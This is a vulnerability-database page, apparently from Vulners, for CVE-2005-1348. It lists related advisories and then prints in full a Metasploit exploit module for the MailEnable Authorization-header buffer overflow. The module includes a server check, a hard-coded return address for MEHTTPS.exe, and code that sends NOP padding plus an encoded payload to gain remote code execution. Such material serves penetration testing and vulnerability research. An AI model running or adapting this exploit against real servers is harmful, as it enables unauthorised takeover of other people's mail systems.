| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2005-1348 | 7 Jul 201000:00 | – | circl | |
| MailEnable HTTP Authorization Header Buffer Overflow (CVE-2005-1348) | 2 Aug 201100:00 | – | checkpoint_advisories | |
| CVE-2005-1348 | 28 Apr 200504:00 | – | cve | |
| CVE-2005-1348 | 28 Apr 200504:00 | – | cvelist | |
| Immunity Canvas: MEWEBMAIL | 2 May 200504:00 | – | canvas | |
| CVE-2005-1348 | 2 May 200504:00 | – | nvd | |
| PT-2005-2350 · Mailenable · Mailenable Professional +1 | 28 Apr 200500:00 | – | ptsecurity | |
| CVE-2004-2726 | 21 May 202521:35 | – | redhatcve | |
| MailEnable HTTPMail Authorization header buffer overflow | 26 Jun 200600:00 | – | saint | |
| MailEnable HTTPMail Authorization header buffer overflow | 26 Jun 200600:00 | – | saint |
`##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'MailEnable Authorization Header Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow in the MailEnable web service.
The vulnerability is triggered when a large value is placed into the Authorization
header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and
MailEnable Professional versions prior to 1.55 are affected.
},
'Author' => 'David Maciejak <david.maciejak[at]kyxar.fr>',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2005-1348'],
['OSVDB', '15913'],
['OSVDB', '15737'],
['BID', '13350'],
['NSS', '18123'],
],
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x0d\x0a"
},
'Platform' => 'win',
'Targets' =>
[
['MEHTTPS.exe Universal', { 'Ret' => 0x006c36b7 }], # mehttps.exe
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 24 2005'))
end
def check
response = send_request_raw
if response and
response['Server'] and
response['Server'] =~ /.*MailEnable/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
buffer = make_nops(24) + payload.encoded + [target.ret].pack('V')
send_request_raw({
'headers' => { 'Authorization' => buffer }
}, 2)
handler
disconnect
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation